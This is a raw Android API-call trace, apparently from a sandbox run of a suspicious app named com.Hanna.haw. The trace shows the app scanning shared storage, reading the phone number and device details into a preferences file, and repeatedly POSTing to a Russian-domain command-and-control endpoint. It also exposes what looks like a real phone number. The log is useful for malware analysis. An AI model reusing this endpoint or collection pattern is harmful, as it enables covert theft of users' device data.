D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/roms]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/roms/sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/roms/sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [list] [FilePath][String] [/storage/sdcard0/roms/sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0/roms/sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/roms/sfc/glgs2.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/roms/sfc/glgs2.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/roms/sfc/sgz3.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/roms/sfc/sgz3.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/roms/sfc/aagt.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/roms/sfc/aagt.sfc]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/2911175bdfc44d29c5108420449f31e0.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/2911175bdfc44d29c5108420449f31e0.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/d9751a9bec053496c714d0c923ee9e9c.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/d9751a9bec053496c714d0c923ee9e9c.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/345eff625296f78ffe32289501de0ca9.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/345eff625296f78ffe32289501de0ca9.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/a6219f9ccd67e44aaeacce9416afb354.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/a6219f9ccd67e44aaeacce9416afb354.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/c75590ac6a0e2fba680d9875b5b9eaf4.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/c75590ac6a0e2fba680d9875b5b9eaf4.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/725424b9214a23af574de56f63cb83be.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/725424b9214a23af574de56f63cb83be.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/9a36985f247a59b9afad8e316c116b2e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/9a36985f247a59b9afad8e316c116b2e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/2e9f233bd1b74838942d8abc02fa62a5.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/2e9f233bd1b74838942d8abc02fa62a5.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/307e57bce6fff66382cbb4736192828d.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/307e57bce6fff66382cbb4736192828d.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/e99d81510ca224ea0a776c5e3cf9e1f1.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/e99d81510ca224ea0a776c5e3cf9e1f1.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/.1cdbf931a31d2321d12da781b35407b8]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/.1cdbf931a31d2321d12da781b35407b8]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/98bee1154471e301169a1de4a971815f.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/98bee1154471e301169a1de4a971815f.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/e7cbd85747774add9f656680ec7f4d06.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/e7cbd85747774add9f656680ec7f4d06.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/no_iconjar.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/no_iconjar.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/80da70f3e7e68f237241d1014fe1242e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/80da70f3e7e68f237241d1014fe1242e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/2966fad2d298fea361b6331df2d07d54.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/6f028315af74604d26b09e9986e3d939.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/.sysdata]
D/S4URC   ( 3713): [SDK] [java.io.File] [listFiles] [FilePath][String] [/storage/sdcard0/.sysdata]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/.sys]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/a10c7feeb2ea97203af961a1d085802d.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/5a138a7a59e3fe4508958b035412f868.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/b074b4ffa387a0d7f651fe4e2694550e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/de319a53e67786f934c0e71a5003aa91.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/00968847a12b352c7c0ed9e2723c096e.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/tangmi.z]
D/S4URC   ( 3713): [SDK] [java.io.File] [getName] [FilePath][String] [/storage/sdcard0/071906f728942ffcd5df869e3be59fdb.apk]
D/S4URC   ( 3713): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/storage/sdcard0/9b722020853d4ef23f7c7ab084bd90f1.apk]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3713): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3713): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][id] [Value][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [DesFile][/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"empty","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"","internet_channel":"wifi","apks":["com.Hanna.haw"]}}]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [DesFile][/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][params] [Return][{"params":{"email":"empty","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"","internet_channel":"wifi","apks":["com.Hanna.haw"]}}]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"empty","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"","internet_channel":"wifi","apks":["com.Hanna.haw"]}}]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][pravila] [Value][empty]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [DesFile][/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][pravila] [Return][empty]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][0]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1528863004198]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1528863004198]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][0]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1528863004198]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][pravila] [Return][empty]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putLong] [Key][ping_time] [Value][1528863008744]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][domens] [Return][empty]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [DesFile][/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [NEW_PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [RETURN][int] [24]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml] [MODE][int] [0660]
D/S4URC   ( 3713): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml.bak]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][params] [Return][{"params":{"email":"empty","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"","internet_channel":"wifi","apks":["com.Hanna.haw"]}}]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][id] [Return][27000544:61-HiZF5Fsi]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][params] [Value][{"params":{"email":"empty","phone":"+601135543513","manufacture":"samsung","model":"galaxys5","android_version":"5.1.1","imei":"none","operator":"","internet_channel":"wifi","apks":["com.Hanna.haw"]}}]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [SDK] [java.net] [HttpURLConnection] [Request][Method] [POST] [URL][String] [http://ei2ll3y1z-a125vww03.ru/apk_main.php?get_hash=7]
D/S4URC   ( 3713): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3713): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.intent.action.MAIN]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][pravila] [Value][empty]
D/S4URC   ( 3713): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/com.Hanna.haw/shared_prefs/semipref.xml]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][apply]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][pravila] [Return][empty]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][period] [Return][0]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3713): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][semipref.xml] [MODE][MODE_PRIVATE] [Method][getIong] [Iong][ping_time] [Return][1528863008744]
